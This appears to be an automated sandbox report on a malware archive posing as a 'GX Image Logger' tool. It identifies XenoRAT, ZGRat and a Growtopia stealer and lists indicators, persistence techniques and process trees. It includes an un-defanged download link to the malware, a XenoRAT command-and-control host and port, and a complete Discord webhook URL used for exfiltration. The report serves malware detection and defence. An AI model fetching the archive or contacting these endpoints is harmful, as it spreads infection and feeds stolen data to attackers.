growtopia | hxxps://www[.]mediafire[.]com/file/fv9veoyx2lf2x66/GX_Image_Logger[.]zip/file

Resubmissions

26-03-2024 10:35

240326-mm4e4sbb2x 10

26-03-2024 10:32

240326-mla26sba7v 1

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
26-03-2024 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/fv9veoyx2lf2x66/GX_Image_Logger.zip/file

Score

10^/10

growtopia xenorat zgrat evasion persistence pyinstaller rat stealer trojan

Malware Config

Extracted

Family

xenorat

jctestwindows.airdns.org

Mutex

Xeno_rat_nd8913d

Attributes

delay
5000
install_path
temp
port
45010
startup_name
WindowsErrorHandler

Extracted

Family

growtopia

https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral1/memory/5076-535-0x00000000049F0000-0x0000000004A5C000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-550-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-549-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-553-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-555-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-569-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-580-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-591-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-601-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-609-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-629-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-632-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-634-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-636-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-638-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-640-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-645-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-647-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-649-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-651-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-653-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-612-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-655-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-657-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-659-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-661-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-663-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-665-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-669-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-671-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-673-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-675-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-677-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1
behavioral1/memory/5076-667-0x00000000049F0000-0x0000000004A55000-memory.dmp	family_zgrat_v1

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
578	discord.com
579	discord.com
610	discord.com

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7768	sc.exe
6384	sc.exe
7828	sc.exe
2740	sc.exe
2136	sc.exe
7660	sc.exe
380	sc.exe
7564	sc.exe
6000	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000800000002333f-538.dat	pyinstaller
behavioral1/files/0x000800000002333f-528.dat	pyinstaller
behavioral1/files/0x000800000002333f-579.dat	pyinstaller
behavioral1/files/0x000800000002333f-608.dat	pyinstaller

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3536	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2228	msedge.exe
2228	msedge.exe
876	msedge.exe
876	msedge.exe
6912	identity_helper.exe
6912	identity_helper.exe
7888	msedge.exe
7888	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

pid	Process
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe
2228	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4820	GX_Builder.exe
4948	GX_Builder.exe
7036	GX_Builder.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 3144	2228	msedge.exe	87
PID 2228 wrote to memory of 3144	2228	msedge.exe	87
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 2188	2228	msedge.exe	88
PID 2228 wrote to memory of 876	2228	msedge.exe	89
PID 2228 wrote to memory of 876	2228	msedge.exe	89
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90
PID 2228 wrote to memory of 3504	2228	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/fv9veoyx2lf2x66/GX_Image_Logger.zip/file
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff25ee46f8,0x7fff25ee4708,0x7fff25ee4718
  2⤵
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:1772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
  2⤵
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
  2⤵
  PID:5444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8412 /prefetch:8
  2⤵
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8464 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8348 /prefetch:1
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8824 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1
  2⤵
  PID:6212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:6596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9676 /prefetch:1
  2⤵
  PID:6708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9164 /prefetch:1
  2⤵
  PID:6716
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10572 /prefetch:8
  2⤵
  PID:6860
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10572 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10684 /prefetch:1
  2⤵
  PID:7044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10360 /prefetch:1
  2⤵
  PID:7060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10276 /prefetch:1
  2⤵
  PID:7068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
